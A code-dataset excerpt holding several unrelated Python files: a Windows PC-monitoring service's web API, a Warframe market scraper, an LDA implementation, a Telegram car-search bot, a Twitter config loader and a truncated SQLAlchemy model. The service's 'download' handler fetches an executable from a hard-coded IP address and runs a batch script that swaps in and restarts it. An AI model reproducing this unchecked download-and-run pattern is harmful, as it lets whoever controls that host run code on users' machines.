elif key=='download':\n info = {\"status\": \"download\"}\n try:\n res =requests.get(r'http://47.75.120.191:83/PCInfoService.exe',timeout=30)\n except Exception as err:\n info = {\"status\":str(err)}\n recordLog(str(err))\n\n down=os.path.join(getPath(),'PCInfoService.exe')\n\n try:\n downloadFile = open(down,'wb')\n for chunk in res.iter_content(100000):\n downloadFile.write(chunk)\n 
#recordLog(os.path.getsize(downloadFile))\n            downloadFile.close()\n            info = {\"status\":\"download finish\"}\n\n            recordLog(\"download finish\")\n            \n            WriteRestartCmd()\n            recordLog(\"update Start\")\n            recordLog(\"shutdown\")\n            \n        except Exception as err:\n            recordLog(str(err))\n            info = {\"status\":str(err)}\n        \n        finally:\n            return [json.dumps(info,ensure_ascii=False,indent=4).encode('utf-8')]\n    \n    else:\n        logging.debug('Noget')\n        info = {\"status\": \"none\"}\n        json_str = json.dumps(info,ensure_ascii=False,indent=4)\n        return [json_str.encode('utf-8')]\n    \n# write a .bat script that deletes the old program and starts the new one\ndef WriteRestartCmd():\n    os.chdir(getPath())\n    b = open(\"upgrade.bat\",'w')\n    TempList = \"@echo off\\n\"; # silence the bat script's output\n    TempList += \"if not exist pcinfoservice.exe exit \\n\"; # exit the script if the new file does not exist\n    TempList += \"sc stop pcinfo \\n\" \n    TempList += \"ping /n 5 127.1>nul \\n\" # delete the old program after 5 seconds (it exits within ~3 s; without the delay the file is still in use and cannot be deleted)\n    TempList += \"del PCInfo.exe /q \\n\"\n    TempList += \"ren PCInfoService.exe PCInfo.exe \\n\"\n    TempList += \"pcinfo.exe install \\n\"\n    TempList += \"sc start pcinfo \\n\"\n    TempList += \"sc config pcinfo start= auto\" \n    b.write(TempList)\n    b.close()\n    subprocess.Popen(\"upgrade.bat\")\n\n\ndef recordLog(strmsg): # append strmsg to the log file\n    logFile = None\n    os.chdir(getPath())\n    try:\n        logFile = open(r'web.log','a')\n        logFile.write(get_time_stamp()+' ') # timestamp prefix\n        logFile.write(strmsg+'\\n')\n    except Exception as err:\n        # the log itself failed; a logger must not raise,\n        # so swallow the error instead of writing to the broken file\n        pass\n    finally:\n        if logFile is not None: logFile.close()\n        return\n\ndef sysInfo():\n    info={}\n    \n    line={}\n    try:\n        line.setdefault('CPU cores',str(psutil.cpu_count()))\n        line.setdefault('CPU usage',str(int(psutil.cpu_percent())) + '%')\n        info['CPU']=line\n\n        line={}\n        line.setdefault('free memory GB',str(round(psutil.virtual_memory().free/(1024.0*1024.0*1024.0), 2)))\n        line.setdefault('total memory GB',str(int(round(psutil.virtual_memory().total/(1024.0*1024.0*1024.0)))))\n        line.setdefault('memory usage',str(int((psutil.virtual_memory().total-psutil.virtual_memory().free)/float(psutil.virtual_memory().total)*100))+ '%')\n        info['Memory'] = line\n        \n        line={}\n        \n        io = psutil.disk_partitions()\n        j=0\n    except Exception as err:\n        recordLog(str(err))\n\n    for i in io:\n        diskstr=[]\n        try:\n            o = psutil.disk_usage(i.device)\n        except Exception as err:\n            recordLog(str(err))\n            j=j+1\n            continue\n        \n        disk=io[j][0].strip(r':\\\\')\n        diskstr.append(str(int(o.free/(1024.0*1024.0*1024.0)))+\"G\")\n        diskstr.append(str(int(o.total/(1024.0*1024.0*1024.0)))+\"G\") \n        line.setdefault(disk,diskstr)\n        del(diskstr)\n        j=j+1\n\n    info['Disk']=line\n    try:\n        info.setdefault('version',gl.getvalue('version'))\n    except Exception as err:\n        recordLog(\"version write err\")\n    \n    return info\n\ndef getPath():\n    # resolve the service executable's directory from the registry\n    try:\n        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,r\"SYSTEM\\CurrentControlSet\\Services\\PCInfo\")\n        downloadPath = winreg.QueryValueEx(key,\"ImagePath\")\n        path=os.path.dirname(downloadPath[0][1:])\n    except Exception as err:\n        path=r'c:\\windows\\system32'\n        recordLog('Path change err: '+ str(err))\n    return path\n\n\ndef get_time_stamp():\n    ct = time.time()\n    local_time = time.localtime(ct)\n    data_head = time.strftime(\"%Y-%m-%d %H:%M:%S\", local_time)\n    data_secs = (ct - int(ct)) * 1000\n    time_stamp = \"%s.%03d\" % (data_head, data_secs)\n    return time_stamp\n", "sub_path": "python-book01/2018/2018-07/PChealth/pc_info_windowsService/WebAPI.py", "file_name": "WebAPI.py", "file_ext": "py", "file_size_in_byte": 5748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": 
"logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.parse.parse_qs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 98, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 103, "usage_type": "call"}, {"api_name": "psutil.cpu_count", "line_number": 121, "usage_type": "call"}, {"api_name": "psutil.cpu_percent", "line_number": 122, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 126, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 127, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 128, "usage_type": "call"}, {"api_name": "psutil.disk_partitions", "line_number": 133, "usage_type": "call"}, {"api_name": "psutil.disk_usage", "line_number": 141, "usage_type": "call"}, {"api_name": "globalvar.getvalue", "line_number": 156, "usage_type": "call"}, {"api_name": "winreg.OpenKey", "line_number": 165, "usage_type": "call"}, {"api_name": "winreg.HKEY_LOCAL_MACHINE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "winreg.QueryValueEx", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 176, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "570612328", "text": "# Install python 3, duh!\n# Run the command below in a cmd window to install the needed packages, without the #, duh!\n# pip install bs4 requests pandas openpyxl lxml html5lib\n# Run the python file with the included batch file, DUH!\n\ntry:\n # Error handling if something happens during script initialisation\n from csv import QUOTE_ALL # Needed to export data to CSV\n from bs4 import BeautifulSoup # Needed to parse the dynamic webpage of the Ducanator\n from requests import get # Needed to get the webpage of the Ducanator\n from re import search # Needed to find the json string to import into pandas\n from pandas import read_csv, set_option, concat, DataFrame, read_json, read_html, ExcelWriter # Needed to convert the json string into a usable dataframe object for manipulation\n from traceback import format_exc # Needed for more friendly error messages.\n from openpyxl import load_workbook\n from numpy import arange\n from os import path\nexcept ModuleNotFoundError:\n print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('You didn\\'t install the packages like I told you to. 
Please run \\\"pip install bs4 requests pandas\\\" in a cmd window to install the required packages!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n\ntry:\n #User Variables\n workbook_name = 'Prime_Relic_Data.xlsx'\n csv_name = 'Prime-Relic Data.csv'\n sheet_name_day = 'Day'\n sheet_name_hour = 'Hour'\n sheet_name_relic = 'Relic_Data'\n retry_attempts = 10\n # Sets the URL to scrape, because hard-coding is bad\n print('Downloading Ducat Data')\n url_ducats = \"https://warframe.market/tools/ducats\"\n # Scrapes the given URL\n soup = str(BeautifulSoup(get(url_ducats).content, \"html.parser\")).replace('\\n', '')\n print('Ducat Data Downloaded')\n print('Processing Ducat Data')\n # Finds the needed json string for item data, previous hour data, and previous day data.\n # Slices off the first bit to make a valid json string for pandas later\n items = search('\"items\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[9:]\n previous_hour = search('\"previous_hour\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[17:]\n previous_day = search('\"previous_day\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[16:]\n\n # Reads and sanitises the item data into a pandas dataframe\n df_items = read_json(items)\n df_items = df_items.drop(columns=['url_name', 'thumb'])\n df_items = df_items.reindex(columns=['id', 'item_name'])\n\n # Reads and sanitises the previous day data into a pandas dataframe\n df_previous_day = read_json(previous_day)\n df_previous_day = df_previous_day.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_day = df_previous_day.rename(columns={'item': 'id'})\n # Merges the item data and previous day data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_day_merged = df_items.merge(df_previous_day, how='inner', on='id')\n df_previous_day_merged = df_previous_day_merged.drop(columns=['id'])\n df_previous_day_merged = df_previous_day_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_day_merged = df_previous_day_merged.sort_values(by='item_name')\n df_previous_day_merged['datetime'] = df_previous_day_merged['datetime'].astype(str).str[:-6]\n\n # Reads and sanitises the previous hour data into a pandas dataframe\n df_previous_hour = read_json(previous_hour)\n df_previous_hour = df_previous_hour.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_hour = df_previous_hour.rename(columns={'item': 'id'})\n # Merges the item data and previous hour data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_hour_merged = df_items.merge(df_previous_hour, how='inner', on='id')\n df_previous_hour_merged = df_previous_hour_merged.drop(columns=['id'])\n df_previous_hour_merged = df_previous_hour_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_hour_merged = df_previous_hour_merged.sort_values(by='item_name')\n df_previous_hour_merged['datetime'] = df_previous_hour_merged['datetime'].astype(str).str[:-6]\n df_previous_hour_merged = df_previous_hour_merged.reset_index(drop=True)\n\n print('Ducat Data Processed')\n # Fuck Comments\n print('Downloading Relic Data')\n url_relics = \"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\"\n 
    relic_data_txt_name = 'RelicData.txt'\n\n    if path.isfile(relic_data_txt_name):\n        with open(relic_data_txt_name) as f:\n            soup = f.read()\n        print(\"Loaded Local Relic Data\")\n    else:\n        print(\"Loading Remote Item Data\")\n\n        for x in range(0, retry_attempts):\n            try:\n                soup = str(BeautifulSoup(get(url_relics).content, \"html.parser\")).replace('\\n', '')\n                print('Saving Local Data')\n                with open(relic_data_txt_name, 'w') as f:\n                    f.write(soup)\n                break\n            except Exception:\n                print('Relic data download failed, retrying... ' + str(retry_attempts - x - 1) + ' attempts left...', end='\\r')\n\n\n    print('Relic Data Downloaded')\n    print('Processing Relic Data')\n    parsed_relics = search('
<h3 id=\"relicRewards\">Relics:</h3>.*?</table>', soup).group(0)[34:].replace('th>', 'td>').replace(r'', r'').replace('X Kuva', 'x Kuva')\n    df_parsed_relics = read_html(parsed_relics, header=None)\n    df_parsed_relics = df_parsed_relics[0].replace(to_replace=r'.+\\((.+)\\%\\)', value=r'\\1', regex=True)\n    df_parsed_relics[1] = df_parsed_relics[1].astype(float)\n    df_parsed_relics = df_parsed_relics.dropna(how='all').fillna(999)\n    groups = df_parsed_relics.groupby(arange(len(df_parsed_relics.index)) // 7, sort=False).apply(lambda x: x.sort_values(by=1, ascending=False))\n    groups[1] = ' (' + groups[1].astype(str) + '%)'\n    groups = groups[0] + groups[1]\n    groups = groups.replace(to_replace=r'\\(999.0\\%\\)', value=r'', regex=True)\n    templist = []\n    templist2 = []\n    for count, value in enumerate(groups):\n        if count % 7 == 0 and count != 0:\n            templist2.append(templist)\n            templist = []\n        templist.append(value)\n    df_even_more_parsed_relics = DataFrame(templist2, columns=['Relic_Name', 'C1', 'C2', 'C3', 'U1', 'U2', 'Rare'])\n    df_relic_class = df_even_more_parsed_relics['Relic_Name'].str.split().str[0]\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Class', df_relic_class, allow_duplicates=True)\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Type', df_even_more_parsed_relics['Relic_Name'].str.upper().str.split().str[1], allow_duplicates=True)\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Refinement', df_even_more_parsed_relics['Relic_Name'].str.split().str[3].replace(to_replace=r'[\\(\\)]', value=r'', regex=True), allow_duplicates=True)\n    dict = {'Exceptional':'','Flawless':'','Radiant':''}\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Raw', df_even_more_parsed_relics['C1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Raw', df_even_more_parsed_relics['C2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Raw', df_even_more_parsed_relics['C3'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Raw', df_even_more_parsed_relics['U1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Raw', df_even_more_parsed_relics['U2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Raw', df_even_more_parsed_relics['Rare'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Odds', df_even_more_parsed_relics['C1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Odds', df_even_more_parsed_relics['C2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Odds', df_even_more_parsed_relics['C3'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Odds', df_even_more_parsed_relics['U1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Odds', df_even_more_parsed_relics['U2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n    df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Odds', df_even_more_parsed_relics['Rare'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n    df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Systems Blueprint',value=r'Systems', regex=True)\n    df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Neuroptics Blueprint',value=r'Neuroptics', regex=True)\n    df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Chassis Blueprint',value=r'Chassis', regex=True)\n    #print(df_even_more_parsed_relics.head(5))\n    #df_even_more_parsed_relics['Relic_Name'] = df_even_more_parsed_relics['Relic_Name'].str.split(n=1).str[1]\n    #df_axi = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Axi'].reset_index(drop=True)\n    #df_lith = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Lith'].reset_index(drop=True)\n    #df_meso = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Meso'].reset_index(drop=True)\n    #df_neo = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Neo'].reset_index(drop=True)\n    #df_requiem = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Requiem'].reset_index(drop=True)\n    #df_final_export_relic = concat([df_axi,df_lith,df_meso,df_neo,df_requiem], axis=1, ignore_index=True)\n    #print(df_even_more_parsed_relics)\n    print('Relic Data Processed')\n\n    # Export data\n    print('Exporting Worksheet')\n    df_even_more_parsed_relics.to_csv(csv_name, index=None, quoting=QUOTE_ALL)\n    df_previous_day_merged.to_csv('DayPrices.csv', index=None, quoting=QUOTE_ALL)\n    with ExcelWriter(workbook_name, mode='a', engine='openpyxl', if_sheet_exists='replace') as writer:\n        df_previous_day_merged.to_excel(writer, sheet_name=sheet_name_day)\n        df_previous_hour_merged.to_excel(writer, sheet_name=sheet_name_hour)\n        df_even_more_parsed_relics.to_excel(writer, sheet_name=sheet_name_relic)\n        #df_final_export_relic.to_excel(writer, sheet_name=sheet_name_relic)\n    book = load_workbook(workbook_name)\n    sheet = book[sheet_name_day]\n    sheet.delete_cols(1,1)\n    sheet = book[sheet_name_hour]\n    sheet.delete_cols(1,1)\n    sheet = book[sheet_name_relic]\n    sheet.delete_cols(1,1)\n    book.save(workbook_name)\n    print('If you see this message, things should have worked correctly. Remove the \\\"pause\\\" from the batch script to automatically close this window after use.')\n\nexcept Exception:\n    # Error handling if something happens during the main script\n    print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! 
The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n", "sub_path": "Scrape the Ducanator.py", "file_name": "Scrape the Ducanator.py", "file_ext": "py", "file_size_in_byte": 12314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "traceback.format_exc", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "re.search", "line_number": 40, "usage_type": "call"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "re.search", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 87, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "re.search", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 148, "usage_type": "name"}, {"api_name": "csv.QUOTE_ALL", "line_number": 149, "usage_type": "name"}, {"api_name": "pandas.ExcelWriter", "line_number": 150, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 155, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "413518482", "text": "from .models import User\nfrom django import forms\n\nclass UserForm(forms.ModelForm):\n class Meta:\n # specify model to be used\n model = User\n\n # specify fields to be used\n fields = [\n \"first_name\",\n \"second_name\",\n ]", "sub_path": "students/y2333/practical_works/Gordienko_Maxim/Practice 2/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "models.User", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "167001807", "text": "\"\"\"\nSimple implementation of (Fisher's) Linear Discriminant Analysis.\nThanks to: https://www.python-course.eu/linear_discriminant_analysis.php\n\nThe L. D. 
Matrix is a transformation matrix which best separates\nthe instances of different classes in data projection.\n\"\"\"\nimport numpy as np\n\n\nclass LDA:\n    def fit(self, X, y):\n        \"\"\"Fit dataset into LDA model.\"\"\"\n        self.X = np.array(X)\n        self.y = np.array(y)\n\n        self.classes, self.cls_freqs = np.unique(y, return_counts=True)\n\n    def _scatter_within(self):\n        \"\"\"This measure describes how scattered each class is.\"\"\"\n        scatter_within = np.array([\n            (cls_freq - 1) * np.cov(self.X[self.y == cls, :], rowvar=False)\n            for cls, cls_freq in zip(self.classes, self.cls_freqs)\n        ]).sum(axis=0)\n\n        return scatter_within\n\n    def _scatter_between(self):\n        \"\"\"This measure describes the separation between different classes.\"\"\"\n        class_means = np.array(\n            [self.X[self.y == cls, :].mean(axis=0) for cls in self.classes])\n\n        total_mean = self.X.mean(axis=0)\n\n        scatter_factor = class_means - total_mean\n\n        scatter_between = np.array([\n            freq * np.outer(sf, sf)\n            for freq, sf in zip(self.cls_freqs, scatter_factor)\n        ]).sum(axis=0)\n\n        return scatter_between\n\n    def _get_eig(self, sw, sb):\n        \"\"\"Get eigenval/vec from (ScatterWithin)^(-1)*(ScatterBetween) mat.\"\"\"\n        sw_inv = np.linalg.inv(sw)\n\n        return np.linalg.eig(np.matmul(sw_inv, sb))\n\n    def _project(self, eig, num_dim):\n        \"\"\"Get the K (``num_dim``) most expressive eigenvalues/vectors.\"\"\"\n        eig_vals, eig_vecs = eig\n\n        eig_vals, eig_vecs = zip(\n            *sorted(\n                zip(eig_vals, eig_vecs.T),  # eig returns eigenvectors as columns\n                key=lambda item: item[0].real,\n                reverse=True)[:num_dim])\n\n        return eig_vals, eig_vecs\n\n    def predict(self, max_dim=2):\n        \"\"\"Create transf. matrix which best separates the fitted data proj.\"\"\"\n        sw = self._scatter_within()\n        sb = self._scatter_between()\n\n        max_dim = min(max_dim, self.classes.size-1)\n\n        eig = self._get_eig(sw, sb)\n\n        eig_vals, eig_vecs = self._project(eig, num_dim=max_dim)\n\n        _, num_col = self.X.shape\n\n        self.eig_vals = np.array(eig_vals)\n        self.transf_mat = np.concatenate(eig_vecs).reshape(max_dim, num_col).T  # eigenvectors as columns\n\n        self.transf_mat = self.transf_mat.real\n\n        return self.transf_mat\n\n    def wilks_lambda(self):\n        \"\"\"Compute Wilks' Lambda measure using eigenvalues of L. D. matrix.\"\"\"\n        return np.prod(1.0 / (1.0 + self.eig_vals))\n\n    def canonical_corr(self):\n        \"\"\"Calculate canonical correlation values from L. D. matrix.\"\"\"\n        return (self.eig_vals / (1.0 + self.eig_vals))**0.5\n\n\nif __name__ == \"__main__\":\n    from sklearn import datasets\n    iris = datasets.load_iris()\n\n    model = LDA()\n    model.fit(iris.data, iris.target)\n    ans = model.predict(max_dim=2)\n\n    print(\"Transformation Matrix:\", ans, sep=\"\\n\", end=\"\\n\\n\")\n    print(\"Eigenvalues of L. D. 
matrix:\", model.eig_vals, end=\"\\n\\n\")\n print(\"Canonical Correlation:\", model.canonical_corr(), end=\"\\n\\n\")\n print(\"Wilks' Lambda:\", model.wilks_lambda())\n", "sub_path": "model-implementation/py-linear-disc-analysis/lda.py", "file_name": "lda.py", "file_ext": "py", "file_size_in_byte": 3243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.linalg.eig", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "291454234", "text": "import os\nimport time\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler\n\nfrom data.copart import Copart\nfrom data.utils import EditThread\n\n\ndef search(update: Update, context):\n default_args = [*([0, float('inf')] * 2)]\n names = ['year_from', 'year_to', 'price_from', 'price_to']\n try:\n filters = {names[i]: int(context.args[i]) if i < len(context.args) and context.args[i] != '-1'\n else default_args[i] for i in range(len(default_args))}\n except ValueError:\n return update.message.reply_text('Все аргументы должны быть целочисленными!')\n message = update.message.reply_text('Начинаем поиск...')\n edit_thread = EditThread(message)\n edit_thread.start()\n start_time = time.time()\n copart = Copart()\n output = copart.get_data(filters)\n edit_thread.stop()\n update.message.reply_text(f'Найдено {len(output)} автомобилей.\\n'\n f'Время поиска: {time.time() - start_time:.2f} секунд')\n for car in output:\n update.message.reply_text(car['ld'])\n\n\ndef start(update, _):\n update.message.reply_text('Привет! Это бот-парсер американских автобирж. 
'\n                              'Type /search {year_from} {year_to} {price_from} {price_to} '\n                              'to search for cars')\n\n\ndef main():\n    updater = Updater(os.getenv('tg_token'))\n    updater.dispatcher.add_handler(CommandHandler('start', start))\n    updater.dispatcher.add_handler(CommandHandler('search', search, pass_args=True))\n    updater.start_polling()\n    updater.idle()\n\n\nif __name__ == '__main__':\n    main()\n", "sub_path": "parsing/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "telegram.Update", "line_number": 11, "usage_type": "name"}, {"api_name": "data.utils.EditThread", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 22, "usage_type": "call"}, {"api_name": "data.copart.Copart", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 39, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "596920294", "text": "import json\nimport tweepy\nfrom tweepy import OAuthHandler\n\nclass _Twitter(type):\n\tdef __call__(cls, *args, **kwargs):\n\t\tif not hasattr(cls, 'instance'):\n\t\t\tcls.instance = super(_Twitter, cls).__call__(*args, **kwargs)\n\t\treturn cls.instance\n\nclass Twitter(object, metaclass=_Twitter):\n\tdef __init__(self):\n\t\tself.consumer_key = ''\n\t\tself.consumer_secret = ''\n\t\tself.access_key = ''\n\t\tself.access_secret = ''\n\t\tself.session = None\n\t\tself.api = None\n\t\tself.maxPage = 0\n\t\tself.maxCount = 0\n\n\tdef loadConfig(self):\n\t\twith open(\"config.json\") as data:\n\t\t\tconf = json.load(data)\n\t\t\tself.consumer_key = conf['consumer_key']\n\t\t\tself.consumer_secret = conf['consumer_secret']\n\t\t\tself.access_key = conf['access_key']\n\t\t\tself.access_secret = conf['access_secret']\n\t\t\tself.maxCount = int(conf['maxCount'])\n\t\t\tself.maxPage = int(conf['maxPage'])\n\t\treturn self\n\n\tdef auth(self):\n\t\tif self.session is None:\n\t\t\tself.session = OAuthHandler(self.consumer_key, self.consumer_secret)\n\t\t\tself.session.set_access_token(self.access_key, self.access_secret)\n\t\t\tself.api = tweepy.API(self.session, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n\t\treturn self\n\n\tdef getAPI(self):\n\t\treturn self.api\n\n\tdef getMaxCount(self):\n\t\treturn self.maxCount\n\n\tdef getMaxPage(self):\n\t\treturn self.maxPage\n\n\nAPI = Twitter().loadConfig().auth().getAPI()\nMaxCount = Twitter().getMaxCount()\nMaxPage = Twitter().getMaxPage()", "sub_path": "TwitterScraper/Twitter/Twitter.py", "file_name": "Twitter.py", "file_ext": "py", "file_size_in_byte": 1407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "127485154", "text": "from datetime import datetime, timezone\n\nfrom app.configs.database import SingletonSQLAlchemy\n\n\ndb = SingletonSQLAlchemy()\n\n\nclass BaseModel(db.Model):\n    __abstract__ = True\n\n    id = db.Column(db.Integer, 
